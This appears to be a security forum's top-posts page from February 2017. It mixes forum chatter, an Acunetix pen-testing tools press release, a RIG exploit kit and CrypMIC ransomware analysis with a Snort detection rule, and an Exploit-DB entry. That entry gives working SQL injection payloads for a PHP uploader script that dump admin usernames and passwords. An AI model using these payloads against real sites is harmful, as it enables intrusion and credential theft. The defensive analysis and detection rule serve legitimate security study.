
Leaderboard

Popular Content

Showing content with the highest reputation on 02/08/17 in all areas

  1. During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a limited timeframe when the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH”.

Read more: https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/
    2 points
  2. Besides that, first-aid courses should be introduced too!!! They are far more useful than other crap subjects invented just so that some well-connected losers who fancy themselves professors have a job.
    2 points
  3. Acunetix Release Web Site Security Pen Testing Tools Free
POSTED ON JANUARY 10, 2017 BY TAMARA NAUDI

HTTP editor, fuzzer and sniffer tools help pen testers identify vulnerabilities

London, UK – January 2016 – Hot on the release of Acunetix Version 11, pioneering web application security software Acunetix is now delivering Manual Pen Testing Tools at no cost. Penetration testers can make use of an HTTP Editor to modify or craft HTTP requests and analyze responses; intercept and modify HTTP traffic on the fly using the integrated HTTP Sniffer; fuzz test HTTP requests using the HTTP Fuzzer and test Blind SQL Injection vulnerabilities further using the Blind SQL Injector, among others.

“Acunetix has for the past decade been an excellent resource in the pentester’s tool kit. Prior to Acunetix v11, these Manual Pen Testing Tools were only available to Acunetix Customers. By releasing our manual tools separately, we aim to facilitate veteran testers as well as up and coming security researchers by making it easy to manually test web applications for logical flaws among others,” added Nicholas Sciberras, CTO, Acunetix.

HTTP Editor: Allows you to create, analyze and edit client HTTP requests, as well as inspect server responses. It also includes an encoding and decoding tool to encode/decode text and URLs to MD5 hashes, UTF-7 and other formats.

HTTP Sniffer: A proxy that allows you to analyze HTTP requests and responses, and edit these while they are in transit. The HTTP sniffer can also be used to manually crawl a site, and use the manual crawl to seed an Acunetix scan.

HTTP Fuzzer: A tool which allows you to automatically send a large number of HTTP requests including invalid, unexpected and random data to a website, to test input validation and handling of invalid data by the web application.

Blind SQL Injector: An automated database data exfiltration tool. By using Blind SQL injection vulnerabilities discovered when scanning a website, it is possible to demonstrate the serious impact a Blind SQL injection vulnerability can have on the website. Used to enumerate databases, tables, fields and dump data from the vulnerable web application.

Subdomain Scanner: Scans a top-level domain to discover subdomains configured in its hierarchy, by using the target domain’s DNS server, or any other DNS server specified by the user. While scanning, this tool will also automatically identify and inform the user if the domain being scanned is using some kind of wildcard characters, such as *.domain.com.

Target Finder: An IP range / port scanner which can be used to discover running web servers on a given IP or within a specified range of IPs. The list of ports on which the web servers are listening can also be configured. The default ports the scanner will scan are port 80 for HTTP and port 443 for SSL.

Authentication Tester: Used to test the strength of both usernames and passwords within HTTP and web forms authentication environments via a dictionary attack.

Download the FREE Manual Pen Testing Tools

About Acunetix
User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology that comprehensively scans and audits complex, authenticated, HTML5 and JavaScript-heavy websites among others. Acunetix detects over 3000 types of web application vulnerabilities and is the industry leader in detecting the largest variety of SQL injection and XSS vulnerabilities, including Out-of-band SQL injection and DOM-based XSS. Acunetix beats competing products in many areas, including speed, limiting false positives and the ability to access restricted areas with ease. Acunetix also has the most advanced detection of WordPress vulnerabilities and a wide range of management and regulatory reports including ISO 27001 and PCI compliance. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats. Acunetix is available on premises or as an online solution.

Acunetix, the company
Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader, and a pioneer in automated web application security technology. Acunetix products and technologies are depended on globally by individual pen-testers and consultants all the way to large organizations. It is the tool of choice for many customers in the Government, Military, Educational, Telecommunications, Banking, Finance, and E-Commerce sectors, including many Fortune 500 companies, such as the Pentagon, Nike, Disney, Adobe and many more.

Source: https://www.acunetix.com/blog/news/acunetix-release-web-site-security-pen-testing-tools-free/
    2 points
  4. Syllabus

Section: Preliminary Skills - Prerequisites
Module 1 : Introduction
Module 2 : Networking
Module 3 : Web Applications
Module 4 : Penetration Testing

Section: Preliminary Skills - Programming
Module 1 : C++
Module 2 : Python

Section: Penetration Testing
Module 1 : Information Gathering
Module 2 : Footprinting & Scanning
Module 3 : Vulnerability Assessment
Module 4 : Web Attacks
Module 5 : System Attacks
Module 6 : Network Attacks

Invitation: https://www.elearnsecurity.com/affiliate/redeem?code=RYW-AIK
    1 point
  5. DLC Boot 2016 is a rescue disk that is used as a Recovery CD. The point is that if you are having problems such as Windows cannot boot, a missing MBR, wanting to format the hard drive, removing viruses and so on, you can simply use DLC Boot 2016 to resolve these issues. DLC Boot 2016 is also able to back up / restore a Windows partition, create partitions, enter a locked Windows, and much more!

* Integrated Mini Windows 10 32/64 bit
* Integrated Mini Windows XP derived from Hiren's version 15.2, rebuilt and optimized again.

TOOLS LIST:

Download: https://docs.google.com/uc?id=0BxTOYa030FZmcDNvOTNhWFU3c00&export=download
    1 point
  6. If only they would teach one basic lesson: "Don't open every piece of junk that someone recommends to you".
    1 point
  7. Nice comparison you made there too. Good thing you didn't compare Romania with America. :)))
    1 point
  8. # # # # # #
# Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Demo: http://demos.nelliwinne.net/MySqlFileUpload/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/download.php?id=[SQL]&t=files
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
# http://localhost/[PATH]/download.php?id=[SQL]&t=images_title
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
# Etc....Other files have vulnerabilities ...
# # # # #

Source: https://www.exploit-db.com/exploits/41267/
    1 point
  9. Two weeks ago he didn't know what a meta charset was and now he's doing bypasses; grandpa is interested in a bypass because his heart is in it. It's copy-pasted from another site; you didn't even bother to translate it.
    1 point
  10. RIG Exploit Kit Overview

The following image shows an example of an iFrame which has been injected into a compromised website. The iFrame redirects users to a proxy that hosts the RIG exploit kit landing page. The RIG infrastructure itself, as shown below, is optimized to segregate servers that host the landing page, exploits and payloads. Victims are only able to see the proxy server with the landing page; resellers and customers are only able to work with the admin server. The actual exploits are stored on the VDS under custody of the RIG crew [2].

After the user is redirected to the proxy, it attempts to exploit the victim’s machine if it is using outdated components such as Adobe Flash. If successful, the RIG exploit kit will then drop and execute CrypMIC ransomware onto the machine and encrypt all files silently in the background. CrypMIC ransomware is still fairly new and it wants to follow in the footsteps of the very popular CryptXXX ransomware. It can encrypt 901 different types of files, to which it doesn’t add an extension, unlike for example Locky, where .locky is added to the end of each file, making it easier to detect [3,4]. This ransomware is particularly dangerous for business organizations because of its ability to encrypt files on removable and network drives.

During encryption, the ransomware replaces the user’s wallpaper with the one shown below. The image states that RSA-4096 is used for encryption when, in fact, research has shown that CrypMIC uses AES-256 [3,4]. The same information is placed in the form of pictures and text files into every folder that is encrypted. The amount of ransom demanded varies from 1.2 to 2.4 bitcoin, that is between $792 and $1,597 [5]. The user is prompted to download TOR, a network that disguises their identity by moving traffic across different TOR servers and encrypting that traffic, and visit a payment page similar to the one shown below.

After payment is received, the victim is supposedly able to download the “Microsoft Decryptor” (please note that this tool has nothing to do with Microsoft). As with all ransomware, the delivery of a decryptor tool and therefore the successful decryption of files is not guaranteed. The question of whether to pay or not to pay has been discussed rigorously throughout the industry. The recent articles about ransomware payment by Nettitude, Kaspersky and Sophos, to name but a few, all have a similar tone: there is no guarantee that the cyber criminals will deliver the key that is required to successfully decrypt the files, and in many cases the data is irretrievably lost. It is therefore strongly advised that payments should not be made [6, 7, 8].

Intrusion Detection Systems, such as Snort, provide signatures for the RIG exploit kit. The signature ID for Snort is 33905. The following rule is associated with the SID:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"EXPLOIT-KIT Rig exploit kit outbound communication"; flow:established,to_server; urilen:>220,norm; content:"/index.php?"; depth:11; http_uri; content:"=l3S"; within:4; distance:15; fast_pattern; http_uri; pcre:"/^\/index\.php\?[A-Za-z0-9_-]{15}=l3S/U"; flowbits:set,file.exploit_kit.flash; metadata:impact_flag red, policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:33905; rev:3;)

The rule looks for a connection from IPs defined in the variable $HOME_NET to IPs defined in the variable $EXTERNAL_NET on port 80. It will only match URIs that are greater than 220 bytes. The image below shows an example of a malicious string that matches the Snort signature. As mentioned above, the exploit kit injects iFrames into compromised websites to redirect users to a proxy.

A comparison of several packet captures containing the RIG exploit kit has shown that the iFrame redirection after the URL is always between 169 and 175 bytes long. The first 16 bytes are truly random characters that change with every iFrame injected into a website. The next 24 bytes are random characters as well, but the comparison has shown that these characters remain the same. The remaining bytes are randomly generated, dependent on the actual payload that is being delivered. More random characters are added on, resulting in a string that is always larger than 220 bytes. To reduce the possibility of false positives, the IDS/IPS rule is very specific: it looks for the string index.php? in the first 11 bytes of the payload, then ignores the next 15 bytes and then looks for the string =l3S. The string =l3S, however, has to match within the next 4 bytes.

As security professionals, we have to investigate this alarm, as well as any associated alarms, to determine whether the exploit kit was successfully delivered and executed. A good way to start an investigation is to look up the IP address at VirusTotal (virustotal.com). However, the IPs change so frequently that the result of VirusTotal alone should not be taken as an indication for success or failure. As a next step, a search for the IP address using URLQuery (urlquery.net) provides a good indication as to whether the IP has been flagged as malicious. Furthermore, URLQuery will show you a screenshot of what the actual website looks like without resolving the IP on your machine and potentially risking an infection. As the image below demonstrates, the website has been associated with the RIG exploit kit. A packet capture helps us to investigate this alarm further. The website malware-traffic-analysis.net provides some packet captures that show the delivery of the exploit kit from the exact same IP addresses that we have observed in the last two weeks [10].

A look at the packet capture provides some useful information about the computer that has been infected with the RIG Exploit Kit. If we take a closer look at the User-Agent above, we can see that the victim is running Windows 7 (Windows NT 6.1) and an outdated browser, Internet Explorer 8. Additionally, we can see that the victim is using a vulnerable version of Adobe Flash by looking at the x-flash-version, which indicates a version of 11.9.900.117. A quick search for Adobe’s Security Bulletin reveals that Adobe has released security updates for Adobe Flash Player 11.9.900.117 and earlier versions [11]. The HTTP object list in the image below shows the content types that are transmitted; application/x-msdownload is associated with .exe and .dll files, while application/x-shockwave-flash is related to Adobe Flash. We have already identified that the victim was running a vulnerable version of Adobe Flash which was exploited to deliver the malicious payload. The image below shows post-infection traffic to 65.49.8.96, and the same IP has been observed throughout various packet captures related to CrypMIC ransomware.

At this point, we can conclude that the user has visited a compromised website and was redirected to the proxy server. An outdated version of Adobe Flash was identified and exploited and the malicious payload was successfully dropped and executed. As a result, all files on the hard drive were encrypted and a ransom demanded. Without having a packet capture, it is relatively hard to determine the actual success of the delivery of ransomware, but an outbound connection to a known malicious site should always be an indicator of success. If the host wasn’t infected it wouldn’t need to communicate to that IP address. As a countermeasure we would recommend, if possible, taking the infected host offline, scanning it for malicious software and blocking the IP address at the perimeter firewall. Blocking the IP alone is not an effective countermeasure because it does not treat the root cause of the problem: a potentially infected host. At this point it doesn’t matter whether the request to the potentially malicious site was blocked by a proxy or a firewall; the fact still remains that there is a host on a network that is actively trying to establish an outbound communication to a malicious site.

Conclusion

Ransomware has become one of the most feared cyber threats in recent years. The FBI predicts a total loss of around 1 billion US dollars caused by crypto-ransomware in 2016 [12]. CrypMIC was neither the first ransomware, nor will it be the last, but it shares the common goal: extort money. Ransomware targets everyone. The same attack can harm an international organization as well as a local restaurant or private Internet users. Ransomware is usually only detected after the malicious software has been installed and files have been encrypted, making early detection all the more important. Intrusion prevention systems can trigger and block a predictable chain of events that happens during the Diffie-Hellman key exchange. If you are able to block the key exchange, you can prevent files from being encrypted because the ransomware won’t progress beyond this point. Ransomware continues to be one of the biggest cyber threats and we cannot simply rely on detecting ransomware from one single source. Instead, we must deploy a comprehensive solution: proactively monitoring traffic and logs to detect ransomware as early as possible.

thecount.
    1 point
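The matching logic of Snort SID 33905 as the post above describes it (urilen over 220, "/index.php?" within the first 11 bytes, 15 bytes skipped, "=l3S" within the next 4, and the anchored PCRE), reimplemented here as an added Python example that is not part of the original post and not Snort's own code. The token, filler and request lines are constructed test data, not real exploit-kit traffic.

```python
import re

# Reconstruction of the rule options quoted in the post:
#   urilen:>220                         -> URI longer than 220 bytes
#   content:"/index.php?"; depth:11     -> the 11-byte literal must fit within the first 11 bytes
#   content:"=l3S"; distance:15; within:4 -> skip 15 bytes, then "=l3S" must start immediately
#   pcre:"/^\/index\.php\?[A-Za-z0-9_-]{15}=l3S/U" -> exactly 15 token chars from that alphabet
URI_PATTERN = re.compile(r"^/index\.php\?[A-Za-z0-9_-]{15}=l3S")
MIN_URILEN = 220
LITERAL = "/index.php?"
MARKER = "=l3S"


def matches_sid_33905(uri: str) -> bool:
    """Return True when a request URI satisfies every option of the rule."""
    if len(uri.encode("utf-8")) <= MIN_URILEN:          # urilen:>220
        return False
    pos = uri.find(LITERAL, 0, 11)                       # content; depth:11
    if pos == -1:
        return False
    start = pos + len(LITERAL) + 15                      # distance:15 after the first match
    # within:4 with a 4-byte pattern leaves no slack: "=l3S" must begin exactly at `start`
    if uri[start:start + len(MARKER)] != MARKER:
        return False
    return URI_PATTERN.match(uri) is not None            # pcre, anchored at the URI start


def scan_request_lines(lines):
    """Pull the URI out of HTTP request lines and return those the rule would fire on."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 2 and parts[0] in ("GET", "POST") and matches_sid_33905(parts[1]):
            hits.append(parts[1])
    return hits


# Constructed sample data (not captured traffic): only the length structure follows the post.
TOKEN_OK = "Ab3_dE9fG-hIj1K"   # 15 characters from [A-Za-z0-9_-]
FILLER = "x" * 210             # pushes the total URI length past 220 bytes

SAMPLE_REQUESTS = [
    f"GET /index.php?{TOKEN_OK}=l3S{FILLER} HTTP/1.1",       # should alert
    f"GET /index.php?{TOKEN_OK}=l3S HTTP/1.1",               # too short for urilen:>220
    f"GET /index.php?{TOKEN_OK}X=l3S{FILLER} HTTP/1.1",      # 16 bytes before the marker
    f"GET /index.php?{TOKEN_OK}=abc{FILLER} HTTP/1.1",       # wrong marker
    f"GET /news/index.php?{TOKEN_OK}=l3S{FILLER} HTTP/1.1",  # literal not within depth:11
]

if __name__ == "__main__":
    for hit in scan_request_lines(SAMPLE_REQUESTS):
        print("SID 33905 would fire on:", hit[:40] + "...")
```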
  11. You don't even believe yourself, especially about the iCloud bypass.
    1 point
  12. I also have an invite, in case anyone needs it: https://www.elearnsecurity.com/affiliate/redeem SIH-BRO
    1 point
  13. A magnetized cathode-ray tube distorts colours. The electrons released by the incandescent filament of the electron gun are drawn by the strong electric field, through vacuum, towards the surface of the screen. Passing through the magnetic field of the deflection coil, they are deflected, forming the image on the screen. An unwanted magnetic field would deflect the electrons in the tube, which would distort the image. An LCD uses a matrix of transistors that apply an electric field, reorienting liquid crystals through transparent electrodes. The liquid crystals sit between two polarizing filters oriented at 90° to one another (so the screen blocks light and becomes opaque). These liquid crystals have the role of reorienting the light polarized by one filter towards the other filter, in such a way that the light passes through the second filter, the screen thereby becoming transparent. The twist angle of the crystals is directly proportional to the electric potential between the transparent electrodes that enclose the liquid like a sandwich. Image formation on an LCD screen is influenced only by that electric potential applied to those transparent electrodes, which regulates the intensity (opacity) of each subpixel (R, G or B). Since the liquid crystals are non-magnetic and the electrons flow only through conductors (they are not released into vacuum), an LCD screen cannot be affected by magnetic fields, nor can it be magnetized. So the image generated by an LCD screen cannot be distorted by a magnetic field. Happy working!
    1 point
  14. .com & .net domains for only 0.29 Euro / first year https://www.hostalia.com/
    -1 points